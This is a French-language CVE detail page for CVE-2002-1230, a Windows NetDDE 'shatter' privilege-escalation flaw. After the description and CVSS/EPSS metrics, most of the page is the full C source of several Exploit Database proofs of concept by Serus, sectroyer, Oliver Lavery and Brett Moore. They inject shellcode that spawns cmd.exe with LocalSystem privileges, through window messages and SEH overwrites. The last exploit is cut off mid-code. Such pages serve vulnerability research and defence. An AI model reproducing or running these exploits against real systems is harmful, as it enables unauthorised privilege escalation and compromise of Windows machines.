CVE-2002-1230 : Détail

CVE-2002-1230

0.59%V4
Local
2004-09-01
02h00 +00:00
2007-11-12
23h00 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

NetDDE Agent on Windows NT 4.0, 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows local users to execute arbitrary code as LocalSystem via "shatter" style attack by sending a WM_COPYDATA message followed by a WM_TIMER message, as demonstrated by GetAd, aka "Flaw in Windows WM_TIMER Message Handling Could Enable Privilege Elevation."

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 21922

Date de publication : 2002-10-08 22h00 +00:00
Auteur : Serus
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent. // /////////// Copyright Serus 2002//////////////// //mailto:serus@users.mns.ru // //This program check system on winlogon bug present //Only for Windows 2000 //This is for check use only! // #include <windows.h> #include <stdio.h> void main(int argc, char *argv[ ], char *envp[ ] ) { char *buf; DWORD Addr = 0; BOOL bExec = TRUE; unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function, // executes cmd.exe on user`s desktop and creates mutex. 0x8B, 0xF4, 0x68, 0x53, 0x45, 0x52, 0x00, 0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00, 0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00, 0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44, 0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69, 0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00, 0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C, 0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4, 0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3 }; HWND hWnd; COPYDATASTRUCT cds; HMODULE hMod; DWORD ProcAddr; HANDLE hMutex; char mutname[4]; printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ===="); // Get NetDDE Window hWnd = FindWindow("NDDEAgnt","NetDDE Agent"); if(hWnd == NULL) { MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP); return; } // Get CreateProcessA and CreateMutexA entry addresses hMod = GetModuleHandle("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 86 + 21) = ProcAddr; ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 15) = ProcAddr; //Generate random Mutex name srand(GetTickCount()); do { mutname[0] = 97 + rand()%25; mutname[1] = 65 + rand()%25; mutname[2] = 65 + rand()%25; mutname[3] = 0; } while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0); memcpy(sc + 3, mutname, 4); //Form buffer for SendMessage buf = (char *)malloc(1000); memset(buf, 0xC3, 1000); memcpy(buf, sc, sizeof(sc)); cds.cbData = 1000; cds.dwData = 0; cds.lpData=(PVOID)buf; //If first login //Send shellcode buffer SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); //Try execute it at 0x0080FA78 PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78); printf("\n\nTrying at 0x%X", 0x0080FA78); //If fails (perhaps not first login) //Try to bruteforce shellcode addresss for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000) { //If mutex exists, shellcode has been executed if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0) { //Success printf("\nSuccess!!!\n"); printf("\nWarning! You system has vulnerability!\n"); CloseHandle(hMutex); return; } printf("\rTrying at 0x%X", Addr); SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr); } //Bug in winlogon not presents printf("\n\nBad luck! Reboot and try again.\n\n"); }
Exploit Database EDB-ID : 21923

Date de publication : 2002-10-08 22h00 +00:00
Auteur : Serus
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5927/info The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent. /* GedAd2 */ // /////////// Copyright (c) 2002 Serus //////////////// //mailto:serus@users.mns.ru // //This program check system on winlogon bug present //Only for Windows 2000 and Windows XP //This is for check use only! // #include <windows.h> #include <stdio.h> void main(int argc, char *argv[ ], char *envp[ ] ) { char *buf; DWORD Addr = 0; BOOL bExec = TRUE; unsigned char sc[] = { // my simple shellcode, it calls CreateProcess function, // executes cmd.exe on user`s desktop and creates mutex. 0x8B, 0xF4, 0x68, 0x53, 0x45, 0x52, 0x00, 0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00, 0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00, 0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44, 0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69, 0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00, 0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C, 0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08, 0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4, 0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3 }; HWND hWnd; COPYDATASTRUCT cds; OSVERSIONINFO osvi; HMODULE hMod; DWORD ProcAddr; HANDLE hMutex; char mutname[4]; printf("\n\n==== GetAd by Serus (serus@users.mns.ru) ===="); // Get NetDDE Window hWnd = FindWindow("NDDEAgnt","NetDDE Agent"); if(hWnd == NULL) { MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP); return; } // Get CreateProcessA and CreateMutexA entry addresses hMod = GetModuleHandle("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 86 + 21) = ProcAddr; ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA"); if(ProcAddr == 0) { MessageBox(NULL, "Couldn't get CreateMutexA address", "Error", MB_OK | MB_ICONSTOP); return; } *(DWORD *)(sc + 15) = ProcAddr; //Generate random Mutex name srand(GetTickCount()); do { mutname[0] = 97 + rand()%25; mutname[1] = 65 + rand()%25; mutname[2] = 65 + rand()%25; mutname[3] = 0; } while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0); memcpy(sc + 3, mutname, 4); //Form buffer for SendMessage buf = (char *)malloc(1000); memset(buf, 0xC3, 1000); memcpy(buf, sc, sizeof(sc)); cds.cbData = 1000; cds.dwData = 0; cds.lpData=(PVOID)buf; //Get OS version osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); if(GetVersionEx(&osvi) == 0) { printf("\nWarning! Couldn't get OS verson. Trying as Win2k.\n"); osvi.dwMajorVersion = 5; } if(osvi.dwMajorVersion != 5) { MessageBox(NULL, "This program for Win2k and WinXP only!", "Error", MB_OK | MB_ICONSTOP); return; } if(osvi.dwMinorVersion == 0) { // Windows 2000 printf("\n\nUse Windows 2000 offsets"); //If first login //Send shellcode buffer SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); //Try execute it at 0x0080FA78 PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78); printf("\nTrying at 0x%X", 0x0080FA78); //If fails (perhaps not first login) //Try to bruteforce shellcode addresss for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000) { //If mutex exists, shellcode has been executed if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0) { //Success printf("\nSuccess!!!\n"); printf("\nWarning! You system has vulnerability!\n"); CloseHandle(hMutex); return; } printf("\rTrying at 0x%X", Addr); SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr); } } else { // Windows XP printf("\n\nUse Windows XP offsets\n"); //Try to bruteforce shellcode addresss 0x00{A|B}4FA74 XP SP1 for(Addr = 0x00A0FA74; Addr < 0x01000000; Addr += 0x10000) { //If mutex exists, shellcode has been executed if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0) { //Success printf("\nSuccess!!!\n"); printf("\nWarning! You system has vulnerability!\n"); CloseHandle(hMutex); return; } printf("\rTrying at 0x%X", Addr); SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr); } } //Bug in winlogon not presents printf("\n\nBad luck! Try after first logon.\n\n"); } /* End GedAd2 */
Exploit Database EDB-ID : 21684

Date de publication : 2002-08-05 22h00 +00:00
Auteur : sectroyer
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. //---------------------------UtlExp.c------------------------------ /****************************************************************** *sectroyer *Random Intruders * *The exploit uses two shatter vulnerabilities to cause *the execution of code. The first option isn't universal *but two others should work with any Win2k with any *language(of course on condition, that you will set *the correct main window title). * *sectroyer@go2.pl * *******************************************************************/ #include <stdio.h> #include <windows.h> #include <commctrl.h> #define NOP 0x90 #define UEF long(__stdcall*)(_EXCEPTION_POINTERS*) // Local Cmd Shellcode unsigned char exec[]= "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xc0" // xor esi, esi "\x50" // push esi "\x68.exe" // push 'exe.' "\x68 cmd" // push 'cmd ' "\x40" // inc esi "\x50" // push esi "\x8d\x45\xF5" // lea edi, [ebp-0xf] "\x50" // push edi "\xb8XXXX" // mov eax, XXXX -> WinExec() "\xff\xd0" // call eax "\x33\xf6" // xor esi,esi "\x4e" // dec esi "\x50" // push esi "\xb8YYYY" // mov eax, YYYY -> ExitProcess() "\xff\xd0" // call eax "\x5d" // pop ebp "\x5d" // pop ebp "\x5d" // pop ebp "\x5d" // pop ebp "\xC3"; // ret unsigned char buf[2048]; long hLVControl,hHdrControl,t=0; char *tWindow; char tWindowEn[]="Utility Manager";// The name of the main window char tWindowPl[]="Mened?er narz?dzi";// The name of the main window long sehHandler = 0x12345678; // Critical Address To Overwrite long shellcodeaddr = 0x7FFDE060; // Known Writeable Space Or Global Space long FindUnhandledExceptionFilter(); void doWrite(long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("Utility Manager Exploit written by sectroyer <sectroyer@go2.pl>\n"); printf("Usage: %s <language> <option>\n", argv[0]); printf("Languages:\n<0> Engilish\n<1> Polish\n"); printf("Options:\n"); printf("<0> LVM_SORTITEMS Vulnerability\n"); printf("<1> HDM_GETITEMRECT using UnhandledExcpetionFilter\n"); printf("<2> HDM_GETITEMRECT using LVM_SORTITEMS Vulnerability\n"); if(argc!=3) return 0; if(atoi(argv[2])<0||atoi(argv[2])>2) return 0; if(atoi(argv[1])<0||atoi(argv[1])>1) return 0; if(!atoi(argv[1])) tWindow=tWindowEn; else tWindow=tWindowPl; // Find local procedure address t=atoi(argv[2]); PROCESS_INFORMATION pi; STARTUPINFO si={sizeof(STARTUPINFO)}; CreateProcessA (NULL,"utilman.exe /start",NULL,NULL,NULL,NULL,NULL,NULL,&si,&pi); Sleep(1000); hMod = LoadLibrary("kernel32.dll"); *(long*)&exec[(int)(strstr((char*)exec,"XXXX")-exec)]=(long) GetProcAddress(hMod,"WinExec"); *(long*)&exec[(int)(strstr((char*)exec,"YYYY")-exec)]=(long) GetProcAddress(hMod,"ExitProcess"); printf("[+] Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("[-] Couldn't Find %s Window\n",tWindow); return 0; } printf("[+] Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("[-] Not Done...\n"); return 0; } void doWrite(long tByte,long address) { SendMessage((HWND) hLVControl,(UINT) LVM_SETCOLUMNWIDTH, 0,MAKELPARAM(tByte, 0)); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,1,address); } long FindUnhandledExceptionFilter() { long *pos; void *hLib; hLib=LoadLibraryA("kernel32.dll"); pos = (long*)hLib; SetUnhandledExceptionFilter((UEF)0xA1A2A3A4); __try { while(1) { if(*pos==0xA1A2A3A4) { SetUnhandledExceptionFilter((UEF)0xB4B3B2B1); if(*pos==0xB4B3B2B1) { SetUnhandledExceptionFilter((UEF)0xFADEFADE); if(*pos==0xFADEFADE) break; } } pos++; } } __except(1) { return NULL; } return (long)pos; } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((void*)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((void*) childhWnd ,GW_HWNDNEXT); } hLVControl = hWnd; hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0); if(hHdrControl != NULL) { // Found a Listview Window with a Header printf("[+] Found listview window..0x%xh\n",hLVControl); if(t!=0) { printf("[+] Found lvheader window..0x%xh\n",hHdrControl); // Inject shellcode to known address printf("[+] Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exec);looper++) doWrite((long) exec[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("[+] Finding UnhandledExceptionFilter....\n"); sehHandler=FindUnhandledExceptionFilter(); printf("[+] Overwriting Top SEH....0x%xh\n",sehHandler); doWrite(((shellcodeaddr) & 0xff),sehHandler); doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3); } if(t==0) { printf("[+] LVM_SORTITEMS Vulnerability\n"); COPYDATASTRUCT cds; memset(buf,NOP,sizeof(buf)); memcpy(buf+700,exec,sizeof(exec)-1); cds.cbData=1000; cds.dwData=0; cds.lpData=buf; SendMessage((void*)hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); SendMessage( (PVOID)hLVControl, LVM_SORTITEMS, 1, 0x007efd04); printf("[+] Done...\n"); } else if(t==1) { printf("[+] HDM_GETITEMRECT Using UnhandledExceptionFilter\n"); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1); printf("[+] Done...\n"); } else if(t==2) { printf("[+] HDM_GETITEMRECT Using LVM_SORTITEMS Vulnerability\n"); SendMessage((HWND) hLVControl,(UINT) LVM_SORTITEMS,1,shellcodeaddr); printf("[+] Done...\n"); } exit(0); } }
Exploit Database EDB-ID : 21685

Date de publication : 2002-08-05 22h00 +00:00
Auteur : Oliver Lavery
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /********************************************************** * CommCtrl 6.0 Button Shatter attack * * Demonstrates the use of windows messages to; * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - SEH_HANDLER_ADDR is the critical address to overwrite * - SHELLCODE_ADDR is the data space to inject the code * - KERN32_BASE_ADDR is the base address of kernel32 on your system * * Oliver Lavery <olavery at pivx.com> * * Based on (and pretty much identical to) shatterseh2.c by * Brett Moore [ brett moore security-assessment com ] **********************************************************/ #include <windows.h> #define _WIN32_WINNT 0x501 #include <commctrl.h> #include <stdio.h> // Local Cmd Shellcode. // Added a loadLibrary call to make sure msvcrt.dll is present -- ol BYTE exploit[] = "\x90\x68\x74\x76\x73\x6D\x68\x63\x72\x00\x00\x54\xB9\x61\xD9\xE7\x77\xFF\xD1\x68\x63\x6D\x64\x00\x54\xB9\x44\x80\xC2\x77\xFF\xD1\xCC"; char g_classNameBuf[ 256 ]; char tWindow[]="Calculator";// The name of the main window #define SEH_HANDLER_ADDR 0x77ed73B4 // Critical Address To Overwrite // you might want to find a less destructive spot to stick the code, but this works for me --ol #define SHELLCODE_ADDR 0x77ed7484 // Known Writeable Space Or Global Space // The range between these will be scanned to find our shellcode bytes. #define KERN32_BASE_ADDR (BYTE *)0x77e61000 // Start of kernel32 #define KERN32_TOP_ADDR (BYTE *)0x77ed0000 // Not the actual top. Just where we stop looking for bytes. void doWrite(HWND hWnd, BYTE tByte, BYTE* address); void IterateWindows(long hWnd); void *FindByteInKernel32( BYTE byte ); void ErrorTrace(const char *msg, DWORD error) { DWORD numWritten; WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), msg, strlen(msg), &numWritten, NULL); if (error) { LPTSTR lpMsgBuf; FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM, NULL, error, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // Default language (LPTSTR) &lpMsgBuf, 0, NULL ); WriteFile( GetStdHandle(STD_OUTPUT_HANDLE), lpMsgBuf, strlen(lpMsgBuf), &numWritten, NULL); // Free the buffer. LocalFree( lpMsgBuf ); } } //"Should there be a reason to believe that code that comes from a variety //of people, unknown from around the world, should be somehow of higher quality //than that from people who get paid to do it professionally?" // - Steve Ballmer // (Hey, wait, are MS employees generally household names? // Isn't MS an equal opportunity employer?) int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("%% Playing with CommCtrl 6.0 messages\n"); printf("%% Oliver Lavery.\n\n"); printf("%% based on Shatter SEH code by\n"); printf("%% brett moore security-assessment com\n\n"); // Find local procedure address hMod = LoadLibrary("kernel32.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "LoadLibraryA"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[13] = ProcAddr; hMod = LoadLibrary("msvcrt.dll"); ProcAddr = (DWORD)GetProcAddress(hMod, "system"); if(ProcAddr != 0) // And put it in our shellcode *(long *)&exploit[26] = ProcAddr; printf("+ Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("+ Not Done...\n"); return 0; } void *FindByteInKernel32( BYTE byte ) { BYTE *addr = KERN32_BASE_ADDR; while ( addr < KERN32_TOP_ADDR ) { if ( *addr == byte ) return addr; addr++; } ErrorTrace( "Couldn't find a shellcode byte in kernel32. Sorry.", 0 ); exit(0); } //"Should there be any reason to believe that a relatively small group of //paid programmers working under the direction of a marketing machine can produce //code approaching the quality of a global team linked by the internet, whose //every line of code is subject to ruthless peer review, and whose only standard //is excellence?" // - crunchie812 void doWrite(HWND hWnd, BYTE tByte, BYTE *address) { void *byte_addr; byte_addr = FindByteInKernel32( tByte ); SendMessage( hWnd,(UINT) BCM_SETTEXTMARGIN,0,(LPARAM)byte_addr); if ( !SendMessage( hWnd, (UINT)BCM_GETTEXTMARGIN, 0, (LPARAM)address) ) { ErrorTrace( "error", GetLastError() ); } } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); while ( strcmp(g_classNameBuf, "Button") ) { // IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); GetClassName( (HWND)childhWnd, g_classNameBuf, sizeof(g_classNameBuf) ); } if(childhWnd != NULL) { printf("+ Found button control..0x%xh\n",childhWnd); // Inject shellcode to known address printf("+ Sending shellcode to...0x%xh\n", SHELLCODE_ADDR); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)childhWnd, exploit[looper],(BYTE *)(SHELLCODE_ADDR + looper)); // Overwrite SEH printf("+ Overwriting Top SEH....0x%xh\n", SEH_HANDLER_ADDR); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR) & 0xff), (BYTE *)SEH_HANDLER_ADDR); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 8) & 0xff), (BYTE *)SEH_HANDLER_ADDR+1); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 16) & 0xff), (BYTE *)SEH_HANDLER_ADDR+2); doWrite((HWND)childhWnd, ((SHELLCODE_ADDR >> 24) & 0xff), (BYTE *)SEH_HANDLER_ADDR+3); // Cause exception printf("+ Forcing Unhandled Exception\n"); doWrite((HWND)childhWnd, 1, (BYTE *)0xDEADBEEF); printf("+ Done...\n"); exit(0); } }
Exploit Database EDB-ID : 21686

Date de publication : 2002-08-05 22h00 +00:00
Auteur : Brett Moore
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges. ** Microsoft has released a statement regarding this issue. Please see the References section for details. A paper, entitled "Win32 Message Vulnerabilities Redux" has been published by iDEFENSE that describes another Windows message that may be abused in a similar manner to WM_TIMER. Microsoft has not released patches to address problems with this message. There are likely other messages which can be exploited in the same manner. Another proof-of-concept has been released by Brett Moore in a paper entitled "Shattering SEH III". This paper demonstrates how Shatter attacks may be used against applications which make use of progress bar controls. Brett Moore has released a paper entitled "Shattering By Example" which summarizes previous Shatter attacks, discusses new techniques and also provides an exploit which abuses Windows statusbars using WM_SETTEXT, SB_SETTEXT, SB_GETTEXTLENGTH, SB_SETPARTS and SB_GETPARTS messages. Please see the attached reference to the paper for more details. /************************************************************************************* * Statusbar Control Shatter exploit * * Demonstrates the use of a combination of windows messages to; * - brute force a useable heap address * - place structure information inside a process * - inject shellcode to known location * - overwrite 4 bytes of a critical memory address * * 4 Variables need to be set for proper execution. * - tWindow is the title of the programs main window * - sehHandler is the critical address to overwrite * - shellcodeaddr is the data space to inject the code * - heapaddr is the base heap address to start brute forcing * * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues * Try it out against any program with a progress bar * *************************************************************************************/ #include <windows.h> #include <commctrl.h> #include <stdio.h> // Local No Null Cmd Shellcode. BYTE exploit[] = "\x90\x33\xc9\x66\xb9\x36\x32\xc1\xe1\x09\x66\xb9\x63\x6d\x51\x54\xbb\x5c\x21\x9d\x77\x03\xd9\xff\xd3\xcc\x90"; char g_classNameBuf[ 256 ]; char tWindow[]="Main Window Title";// The name of the main window long sehHandler = 0x7cXXXXXX; // Critical Address To Overwrite long shellcodeaddr = 0x7fXXXXXX; // Known Writeable Space Or Global Space unsigned long heapaddr = 0x00500000; // Base Heap Address long mainhWnd; void doWrite(HWND hWnd, long tByte,long address); void BruteForceHeap(HWND hWnd); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { HMODULE hMod; DWORD ProcAddr; long x; printf("%% Playing with status bar messages\n"); printf("%% brett.moore@security-assessment.com\n\n"); if (argc == 2) sscanf(argv[1],"%lx",&heapaddr); // Oddity printf("%% Using base heap address...0x%xh\n",heapaddr); printf("+ Finding %s Window...\n",tWindow); mainhWnd = (long)FindWindow(NULL,tWindow); if(mainhWnd == NULL) { printf("+ Couldn't Find %s Window\n",tWindow); return 0; } printf("+ Found Main Window At......0x%xh\n",mainhWnd); IterateWindows(mainhWnd); printf("+ Done...\n"); return 0; } void BruteForceHeap(HWND hWnd, long tByte,long address) { long retval; BOOL foundHeap = FALSE; char buffer[5000]; memset(buffer,0,sizeof(buffer)); while (!foundHeap) { printf("+ Trying Heap Address.......0x%xh ",heapaddr); memset(buffer,0x58,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); printf("%d",retval); if(retval == 1) { // First Retval should be 1 memset(buffer,0x80,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Part Contents SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr); retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0); if(retval > 1) { // Second should be larger than 1 printf(" : %d - Found Heap Address\n",retval); return(0); } } printf("\n"); heapaddr += 2500; } } void doWrite(HWND hWnd, long tByte,long address) { char buffer[5000]; memset(buffer,0,sizeof(buffer)); memset(buffer,tByte,sizeof(buffer)-1); // Set Window Title SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer); // Set Statusbar width SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr); SendMessage( hWnd,(UINT) SB_GETPARTS,1,address); } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT); } GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) ); if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0) { // Find Heap Address BruteForceHeap((HWND) hWnd); // Inject shellcode to known address printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exploit);looper++) doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("+ Overwriting Top 